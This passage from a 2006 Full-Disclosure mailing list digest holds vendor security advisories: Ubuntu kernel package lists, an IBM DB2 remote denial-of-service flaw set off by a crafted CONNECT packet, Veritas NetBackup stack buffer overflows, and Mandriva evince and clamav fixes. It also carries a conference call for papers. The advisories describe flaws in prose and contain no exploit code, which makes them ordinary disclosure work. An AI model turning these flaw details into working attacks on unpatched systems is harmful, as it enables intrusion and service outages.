    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   214708 5b08264c5654d488c47297a4ca329f1a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    12702 7707f8821e91fe9400954519f7aaf965
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    13316 baf58b173ccd83daa99749aea99f4408
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    83236 5a06f44dc0806a0fb67a93c68b421bc6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    97172 e35bd01bf40e88cc464c79a76d36ad3e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    71170 b210a0baeab68e23c879aacaabef2082
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    84204 1ff129ad7b6736d2fd60601febfecf42
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:     6348 d3d8ff801a45d51f316436a53c4afbca
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:     6890 f3c31e5c8d714a859ac3b74f000ddc92
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    57008 d512b07ac243253853744e8e96147151
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    69208 7d92f7fd597d8b1348df7dea0ebfec7d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   128614 0a4dae24e9590b4a191200e14bf89440
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   156240 6903f1e1feeac5300ac772d1cafc7e93
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   109716 ddb887f74ec9063dc48e09899ad6ac5c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   132990 6cb73611f793340038c93b109ac3c15a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    86622 06957569095e5f8a0958dd1ceeee411b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    94824 a58d193d055590d95f378be2c9c24e26
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:  1511522 fcdf5fae144aef6932f1c7aafdb52128
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:  1521670 3516ed9e8b3b18cf427a38f6f69cad61
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   101312 0c5200e803de7b28ada781829fc96469
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   115566 425f1ca894970a3c567d338ba75a6ff2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    12204 133104d3fda02d9007276babb08c96b1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    14292 711666984656587c2b37880a684aec10
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    84676 39e3e852cfbb6206b6ff824027e674fc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    87956 845a24c0546d082b97e960426a4a25ed
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    37282 5781318cfcf95db46dbb52284afe6e38
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    40250 76d88263c04422360e9b3d58794522c7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   140006 896ef23d04fc11ac3b2e7d5237ebe42a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   161504 fee24ae2e0fdb4eae98d89ba32fe4cc1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    49998 bffebc61937a874953c242a57ce1f664
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:    54872 f381d6473132b28069ca85e351fa825f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-10-powerpc-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   308232 da0ab3f9709f42c9925f7202b7da5686
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-10-powerpc64-smp-di_2.6.17.1-10.34_powerpc.udeb
      Size/MD5:   330236 90b72d7166e8b6c135e53799e3c6a0cf

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:    50734 4cb3951cf9da37d62867f32f79feb7ef
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:     2386 5b7e1502de13fd49c24411194a3d15d7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:    40592 a27f11d4561c539161cf7c65316677af
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:   112138 0d8efd9477fc734e9626214041af7154
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:    41350 57930dc08cd1d1046915eeae9e6e5386
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:   105096 b0725af7d580ba6d60ac508d01704601
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:     6860 ca89ea76fd58bf85c685eecd9c6ea8c0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:   147452 2702367b587579cb840430401d5f5060
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:  1839954 9534b16eb5a26c337f1e5439b1505c28
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10-sparc64-smp_2.6.17.1-10.34_sparc.deb
      Size/MD5:   811802 6f5970f1fbd0cec2ec25ff67d7620317
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10-sparc64_2.6.17.1-10.34_sparc.deb
      Size/MD5:   807530 b01cd5b37de7d8c416809fd94cd87b64
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10_2.6.17.1-10.34_sparc.deb
      Size/MD5:  7421000 179764f0d4c7d70c0e8d924da24b4294
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-10-sparc64-smp_2.6.17.1-10.34_sparc.deb
      Size/MD5: 15973974 d324a149fea92873fce677a731c71fb7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-10-sparc64_2.6.17.1-10.34_sparc.deb
      Size/MD5: 15631694 07954acb9b5d26251972d9ff15ccb457
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-10-sparc64-smp_2.6.17.1-10.34_sparc.deb
      Size/MD5:  2170178 3c60e27da17391dcc3fca8ebeee9a9d2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-10-sparc64_2.6.17.1-10.34_sparc.deb
      Size/MD5:  2084478 f6bd575f4cdacaf10892dffb2b4a823b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-10.34_sparc.deb
      Size/MD5:  1811754 669a28e9cee4dfe2ee106b3891727d70
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:     7402 978f7985bcad9375ec1fd2f729ca5295
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:   263992 2ee6c7a11212dfef241622598f7ff4f5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:   229206 7f80149d236c7b1dd0bfdbfbe265bdc8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:  1048446 f32509cc9915b34ef5f5046d33124357
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:  1922058 2253712595a58aa1fcb19a5d10cb4ecf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:     9914 f23f7acace731837a86fa44eb7cdc8ea
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:    40360 5c6a39f167077f0525866192cfae9bf3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:     8722 298b1a6eb9c335634d644833c17d4b9b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:    59390 fb851703c10145119deac24fc8d3cf92
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:   162878 66e061f744cbf10094be049392e9d8c6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:    66652 31e9282d295acb58d2ffdd9078176999
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:   855852 094b9e9264a7bf27d0385145f6cc7d60
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:    51822 d6d0fb4dbac3ab3e72b475fa6aba75b1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:    38426 92c0800a8757bb42f8e9ae445317c3af
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-10-sparc64-di_2.6.17.1-10.34_sparc.udeb
      Size/MD5:   283100 f3121b6b524677748d8eba2bda1ef93b
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061213/f3c94b91/attachment.bin 

From shatter at appsecinc.com  Wed Dec 13 19:29:42 2006
From: shatter at appsecinc.com (Team SHATTER)
Date: Wed, 13 Dec 2006 14:29:42 -0500
Subject: [Full-disclosure] IBM DB2 Remote DoS during CONNECT processing
Message-ID: <458054A6.9080904@appsecinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

IBM DB2 Remote DoS during CONNECT processing

AppSecInc Team SHATTER Security Advisory:
http://www.appsecinc.com/resources/alerts/db2/2006-09-05.shtml

Affected versions: All versions of IBM DB2 Database Server

Risk level: Medium

Credits: This vulnerability was discovered and researched by Vivek
Rathod of Application Security Inc.

Details:
When connecting to a remote DB2 instance, the version 7 client typically
sends a SQLJRA packet requesting start of the connection. If this SQLJRA
packet is specially crafted, it can cause a DoS attack by crashing the
DB2 instance. Altering a few bytes at specific offsets in the packet
exposes multiple NULL/invalid pointer dereference bugs in the server code.
For example, on Windows, if 0x00 is used at any of these offsets, the
sqle_db2ra_as_con_database function (from DB2ENGN.DLL) attempts to
access NULL or invalid memory locations, causing an unhandled access
violation (0xC0000005). This causes the DB2 instance to crash.

Impact:
Any remote unauthenticated attacker can crash the DB2 instance.

Vendor Status:
Vendor was contacted and a patch was released.

Fix:
To fix the problem apply the fixpak 13 for DB2 version 8.1 (same as 8.2 FP6)
http://www-306.ibm.com/software/data/db2/udb/support/downloadv8.html

Links:
Application Security, Inc advisory:
http://www.appsecinc.com/resources/alerts/db2/2006-09-05.shtml
IBM APAR: http://www-1.ibm.com/support/entdocview.wss?uid=swg1IY86917
Secunia Advisory: http://secunia.com/advisories/21550/
CVE Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4257

- --
Application Security, Inc.
www.appsecinc.com
AppSecInc is the leading provider of database security solutions for the
enterprise. AppSecInc products proactively secure enterprise
applications at more than 300 organizations around the world by
discovering, assessing, and protecting the database against rapidly
changing security threats. By securing data at its source, we enable
organizations to more confidently extend their business with customers,
partners and suppliers. Our security experts, combined with our strong
support team, deliver up-to-date application safeguards that minimize
risk and eliminate its impact on business.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFFgFSm9EOAcmTuFN0RAs0uAKDD2JmnlktSvdZg/UdVtBZMcN8aMwCfR7AJ
toZoy4X4AWp5t8Ut7vvkj8U=
=tvlM
-----END PGP SIGNATURE-----
-------------- next part --------------
A non-text attachment was scrubbed...
Name: 0x64EE14DD.asc
Type: application/pgp-keys
Size: 1701 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061213/765fa953/attachment.bin 

From zdi-disclosures at 3com.com  Wed Dec 13 20:58:51 2006
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Wed, 13 Dec 2006 12:58:51 -0800
Subject: [Full-disclosure] ZDI-06-049: Symantec Veritas NetBackup Long
 Request Buffer Overflow Vulnerability
Message-ID: 

ZDI-06-049: Symantec Veritas NetBackup Long Request Buffer Overflow
            Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-049.html
December 13, 2006

-- CVE ID:
CVE-2006-6222

-- Affected Vendor:
Symantec

-- Affected Products:
Veritas NetBackup 6.0 < MP4
Veritas NetBackup 5.1 < MP6
Veritas NetBackup 5.0 < MP7

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since November 20, 2006 by Digital Vaccine protection
filter ID 4505. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Symantec Veritas NetBackup. Authentication
is not required to exploit this vulnerability.

The specific flaw exists within bpcd.exe during the parsing of overly
long requests to a NetBackup Master/Media Server. Communications to
this process are prefixed with a length, which, if malformed can result
in a stack based buffer overflow. Exploitation of this vulnerability can
lead to complete system compromise.

-- Vendor Response:
Symantec has issued an update to correct this vulnerability. More
details can be found at:

    http://www.symantec.com/avcenter/security/Content/2006.12.13a.html

-- Disclosure Timeline:
2006.08.14 - Vulnerability reported to vendor
2006.11.20 - Digital Vaccine released to TippingPoint customers
2006.12.13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Sebastian Apelt.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.



From zdi-disclosures at 3com.com  Wed Dec 13 20:59:56 2006
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Wed, 13 Dec 2006 12:59:56 -0800
Subject: [Full-disclosure] ZDI-06-050: Symantec Veritas NetBackup
 CONNECT_OPTIONS Buffer Overflow Vulnerability
Message-ID: 

ZDI-06-050: Symantec Veritas NetBackup CONNECT_OPTIONS Buffer Overflow
            Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-050.html
December 13, 2006

-- CVE ID:
CVE-2006-5822

-- Affected Vendor:
Symantec

-- Affected Products:
Veritas NetBackup 6.0 < MP4
Veritas NetBackup 5.1 < MP6
Veritas NetBackup 5.0 < MP7

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since November 20, 2006 by Digital Vaccine protection
filter ID 4506. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Symantec Veritas NetBackup. Authentication
is not required to exploit this vulnerability.

The specific flaw exists within bpcd.exe during the parsing of overly
long CONNECT_OPTIONS requests to a NetBackup Master/Media Server. When
the CONNECT_OPTIONS command is parsed, the contents are copied into a
stack allocated buffer without proper length checking. Exploitation of
this vulnerability can lead to complete system compromise.

-- Vendor Response:
Symantec has issued an update to correct this vulnerability. More
details can be found at:

    http://www.symantec.com/avcenter/security/Content/2006.12.13a.html

-- Disclosure Timeline:
2006.08.14 - Vulnerability reported to vendor
2006.11.20 - Digital Vaccine released to TippingPoint customers
2006.12.13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Sebastian Apelt.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.



From sysadmin at agent.co.il  Wed Dec 13 22:44:47 2006
From: sysadmin at agent.co.il (Ag. System Administrator)
Date: Thu, 14 Dec 2006 00:44:47 +0200
Subject: [Full-disclosure] [Fwd: MOST URGENT]
Message-ID: <4580825F.1050808@agent.co.il>

Sorry for spamming the list, but i cannot resist...

Soooooooo stupid... :)

Thanks,
Dan
-------------- next part --------------
An embedded message was scrubbed...
From: "Dr. Borris Olga" 
Subject: MOST URGENT 
Date: Wed, 13 Dec 2006 18:13:29 +0900 (JST)
Size: 3207
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061214/96f6203b/attachment.mht 

From dr at kyx.net  Wed Dec 13 23:58:03 2006
From: dr at kyx.net (Dragos Ruiu)
Date: Wed, 13 Dec 2006 15:58:03 -0800
Subject: [Full-disclosure] CanSecWest 2007 (April 18-20) Call For Papers
	(Deadline Jan 7th)
Message-ID: <200612131558.03426.dr@kyx.net>

CanSecWest 2007 CALL FOR PAPERS

VANCOUVER, Canada -- The eighth annual CanSecWest applied technical security 
conference - where the eminent figures in the international security industry 
will get together share best practices and technology - will be held in 
downtown Vancouver at the the Mariott Renaissance Harbourside on April 18-20, 
2007. The most significant new discoveries about computer network hack 
attacks and defenses, commercial security solutions, and pragmatic real world 
security experience will be presented in a series of informative tutorials. 

The CanSecWest 2007 meeting provides international researchers a relaxed, 
comfortable environment to learn from informative tutorials on key 
developments in security technology, and collaborate and socialize with their 
peers in one of the world's most scenic cities - a short drive away from one 
of North America's top skiing areas. 

The CanSecWest 2007 conference will also feature the availability of the 
Security Masters Dojo expert network security sensei instructors, and their 
advanced, and intermediate, hands-on training courses - featuring small class 
sizes and practical application excercises to maximize information transfer. 

We would like to announce the opportunity to submit papers, and/or lightning 
talk proposals, for selection by the CanSecWest technical review committee. 
Please make your paper proposal submissions before January 7th, 2007. Slides 
for the papers must be submitted by March 15th, 2007. 

Some invited papers have been confirmed, but a limited number of speaking 
slots are still available. The conference is responsible for travel and 
accomodations for the speakers. If you have a proposal for a tutorial session 
then please email a synopsis of the material and your biography, papers and, 
speaking background to secwes07 at cansecwest.com. Only slides will be needed 
for the March paper deadline, full text does not have to be submitted - but 
will be accepted if available. 

The CanSecWest 2007 conference consists of tutorials on technical details 
about current issues, innovative techniques and best practices in the 
information security realm. The audiences are a multi-national mix of 
professionals involved on a daily basis with security work: security product 
vendors, programmers, security officers, and network administrators. We give 
preference to technical details and new education for a technical audience. 

The conference itself is a single track series of presentations in a lecture 
theater environment. The presentations offer speakers the opportunity to 
showcase on-going research and collaborate with peers while educating and 
highlighting advancements in security products and techniques. The focus is 
on innovation, tutorials, and education instead of product pitches. Some 
commercial content is tolerated, but it needs to be backed up by a technical 
presenter - either giving a valuable tutorial and best practices instruction 
or detailing significant new technology in the products. 

Paper proposals should consist of the following information: 

1) Presenter, and geographical location (country of origin/passport) and 
contact info (e-mail, postal address, phone, fax). 
2) Employer and/or affiliations. 
3) Brief biography, list of publications and papers. 
4) Any significant presentation and educational experience/background. 
5) Topic synopsis, Proposed paper title, and a one paragraph description. 
6) Reason why this material is innovative or significant or an important 
tutorial. 
7) Optionally, any samples of prepared material or outlines ready. 
8) Will you have full text available or only slides? 
9) Please list any other publications or conferences where this material has 
been or will be published/submitted. 

Please include the plain text version of this information in your email as 
well as any file, pdf, sxw, ppt, or html attachments. (Some reviewers only
look at .txt info.) Multiple submissions are acceptable.

Please forward the above information to be considered for placement on the 
speaker roster, or have your short lightning talk scheduled. Send all 
conference related correspondence to secwes07 at cansecwest.com.

thanks,
--dr

-- 
World Security Pros. Cutting Edge Training, Tools, and Techniques
London, U.K.    Feb 28 / Mar 1 - 2007    http://eusecwest.com
pgpkey http://dragos.com/ kyxpgp



From simon at snosoft.com  Thu Dec 14 02:14:14 2006
From: simon at snosoft.com (Simon Smith)
Date: Wed, 13 Dec 2006 21:14:14 -0500
Subject: [Full-disclosure] SinFP OS fingerprinting online demo
In-Reply-To: <20061213150839.GA3572@oshima.enslaved.lan>
Message-ID: 

Doesn't seem to work man ;P


On 12/13/06 10:08 AM, "fd at gomor.org"  wrote:

> Sorry, I forgot to mention that a benchmark versus Nmap has
> been done by someone on his blog:
> 
> http://www.computerdefense.org/?p=173




From security at mandriva.com  Thu Dec 14 04:28:01 2006
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 13 Dec 2006 21:28:01 -0700
Subject: [Full-disclosure] [ MDKSA-2006:229 ] - Updated evince packages fix
	buffer overflow vulnerability
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:229
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : evince
 Date    : December 13, 2006
 Affected: 2007.0
 _______________________________________________________________________
 
 Problem Description:
 
 Stack-based buffer overflow in ps.c for evince allows user-assisted
 attackers to execute arbitrary code via a PostScript (PS) file with
 certain headers that contain long comments, as demonstrated using the
 DocumentMedia header.

 Packages have been patched to correct this issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5864
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 9cac7456ee1b25c93bd73c430475baaf  2007.0/i586/evince-0.6.0-1.2mdv2007.0.i586.rpm 
 d8a6e0604fe5fff79909659bd2fa0136  2007.0/SRPMS/evince-0.6.0-1.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 5d231a5f65991fe2383cdfc907425b77  2007.0/x86_64/evince-0.6.0-1.2mdv2007.0.x86_64.rpm 
 d8a6e0604fe5fff79909659bd2fa0136  2007.0/SRPMS/evince-0.6.0-1.2mdv2007.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFgKj+mqjQ0CJFipgRAtBCAKDKnwM086Y9DupRDVTrAjnpH8bAVQCg3kLy
+Sol3MJsG9wREueQWX6g1Fw=
=/c4l
-----END PGP SIGNATURE-----



From security at mandriva.com  Thu Dec 14 04:47:00 2006
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 13 Dec 2006 21:47:00 -0700
Subject: [Full-disclosure] [ MDKSA-2006:230 ] - Updated clamav packages fix
	vulnerability
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:230
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : clamav
 Date    : December 13, 2006
 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________
 
 Problem Description:
 
 The latest version of ClamAV, 0.88.7, fixes some bugs, including
 vulnerabilities with handling base64-encoded MIME attachment files that
